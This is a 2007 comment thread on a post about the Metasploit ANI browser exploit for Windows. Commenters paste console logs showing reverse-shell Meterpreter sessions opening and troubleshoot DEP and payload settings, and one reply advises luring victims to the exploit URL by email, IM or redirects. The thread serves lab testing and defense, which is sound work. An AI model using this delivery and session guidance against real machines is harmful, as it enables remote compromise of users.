Comments on Metasploit: Exploiting the ANI vulnerability on Vista
Comment feed for the post by hdm, last updated 2008-09-25.

Comment posted 2007-08-07 17:48:

Hi All!

>> exploit

[*] Started reverse handler
[*] Using URL: http://127.0.0.1:8080/rdDlcXdsSyGT8
[*] Server started.
[*] Exploit running as background job.

Right... But when I open the site http://127.0.0.1:8080/rdDlcXdsSyGT8 it shows this:

(long run of random characters)

and doesn't open the download of the .ani archive...

Anyone know why?
:(

Thanks.

-- Anonymous

Comment posted 2007-04-21 16:48:

Nice job HD, but why is reverse_tcp not working, unlike bind_tcp?

-- Anonymous

Comment posted 2007-04-11 01:28:

>> exploit
[*] Started reverse handler
[*] Using URL: http://192.168.1.103:8080/rdDlyGT8
[*] Server started.
[*] Exploit running as background job.
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.103:4050)

>> sessions -i 1
[*] Starting interaction with 1...

(running)

>> help
?          Help menu
channel    Displays information about active channels
close      Closes a channel
exit       Terminate the meterpreter session
help       Help menu
interact   Interacts with a channel
irb        Drop into irb scripting mode
migrate    Migrate the server to another process
quit       Terminate the meterpreter session
read       Reads data from a channel
run        Executes a meterpreter script
use        Load a one or more meterpreter extensions
write      Writes data to a channel
>>
>> use stdapi
Loading extension stdapi...
[-] failure: No such file or directory - C:/Program Files/Metasploit/Framework3/framework/data/meterpreter/ext_server_-m.dll
(long Ruby stack trace omitted)
Everything starts out fine. Once I issue the "use stdapi" command, it doesn't load successfully. I get a failure notice. I'm using the windows/browser/ani_imageload_chunksize sploit. Payload = windows/meterpreter/reverse_tcp.

I'm just wondering why, whenever I run the command "use stdapi" to start the library, I get a failure notice. Anyone know why I'm getting this? I get the same notice on BT2 and Windows.

Sorry for the long post. I'm just really stumped with this.

-- Anonymous

Comment posted 2007-04-07 01:38:

Thanks for your answer. I didn't make clear that I was checking my own system to see how vulnerable it was. So I took the link and opened it with Firefox and IE, but nothing happens.

Also, I was playing with a PoC that said it defeated DEP, and it worked, but it was written to call the system function and run whatever command we wanted with it.

I tried to make it run shellcode, but after creating my file and accessing it via the Explorer window a screen appears saying that DEP detected some code trying to be run from memory.

So I think that is why the ANI Metasploit module didn't work.

Regards,
Circuit

-- Anonymous

Comment posted 2007-04-07 00:25:

Once the exploit starts the listening web server, it's *your* job to get a vulnerable client to connect to that web server and request the URL.
Make sure your Metasploit system is accessible to the victim and send them a link through whatever method is easiest (redirect from a web site, email, IM, etc).

-- hdm

Comment posted 2007-04-06 22:59:

I tried the ANI HTTP exploit to see if my machine is vulnerable, but it just stays on the following screen forever without changing anything.

msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler
[*] Using URL: http://my_ip:8080/foo
[*] Server started.
[*] Exploit running as background job.
msf exploit(ani_loadimage_chunksize) >

I'm testing it on WinXP Pro Version 2002 with SP2 installed.
I also tried with netcat listening on the remote port I configured the exploit for, but it just stays listening there forever.

Maybe I have DEP enabled and that's why it isn't working. How can I know if I have DEP enabled?

Regards,
Circuit

-- Anonymous

Comment posted 2007-04-05 07:00:

Hello All,

Thanks for the response HD... I realized afterwards that I missed adding a word which probably would have changed your response. Instead of saying "the command prompt stays the same & does display the following)" I meant to say "& does NOT display the following". In any case, we did end up getting this to work, as it seemed that after doing a few updates in MSF 3 some later iterations of the exploit did work.
I just wanted to say thanks for the great work that you do... the ease with which we can test this, so we can proactively work towards a solution, is a great asset to the industry.

Regards
Rex69

-- Rex69

Comment posted 2007-04-03 08:40:

That "session 1 opened" message means that the exploit worked and a session was created. Use the "sessions -l" command to list active sessions and "sessions -i ID" to interact with them. Congratulations, it worked :-)

-- hdm

Comment posted 2007-04-03 07:54:

Hi there... We've been trying to use the ANI HTTP exploit in our test lab at work, but seem to be having an issue getting this to work. Right now, when we launch the exploit, we get to this point:

msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler
[*] Using URL: http://10.4.4.1:8080/foo
[*] Server started.
[*] Exploit running as background job.
msf exploit(ani_loadimage_chunksize) >

We then try to connect our victim PC to the HTTP link provided, but nothing seems to be happening on the attacker PC (i.e.
the command prompt stays the same & does display the following)

[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.4.4.1:4444 -> 10.4.4.2:49310)

We've tried many ways to get this to work, but we may be missing something... So if anyone is able to shed a bit more light on this, that would be greatly appreciated.

Regards
Rex69

-- rex69

Comment posted 2007-04-02 10:21:

The default hardware DEP setting is "OptIn", which only protects Windows Explorer.exe. If your system supports hardware DEP (NX or XD CPU bit enabled), it will prevent exploitation inside Explorer but not inside IE or the other vectors. Changing it to AlwaysOn or OptOut will protect against the other vectors.

Keep in mind that DEP can be bypassed, but not extremely trivially. Good luck.

-- Anonymous

Comment posted 2007-04-02 08:18:

If DEP is enabled for all processes, I believe that the exploit is blocked in its current form.
You can grab the new ANI exploits by using the 'Online Update' feature in the Windows version of the framework and 'svn update' in the Unix version.

-- hdm

Comment posted 2007-04-02 08:09:

Where can I download this exploit for Metasploit?

-- Anonymous

Comment posted 2007-04-02 05:37:

Does DEP work against this exploit or doesn't it? You write that DEP is disabled for Explorer, but what if the user actually has enabled DEP?

-- Anonymous

Comment posted 2007-04-02 00:46:

Cool !! :)

At the time I released the exploit, I had no Vista test base, so I did not look for a way to get code execution on Vista. However, after I read your posts, I think the heap spraying technique that I use in the XP SP2 version "may be" also usable to exploit this vulnerability on Vista too - not confirmed, but I will test it.

-- Trirat Puttaraksa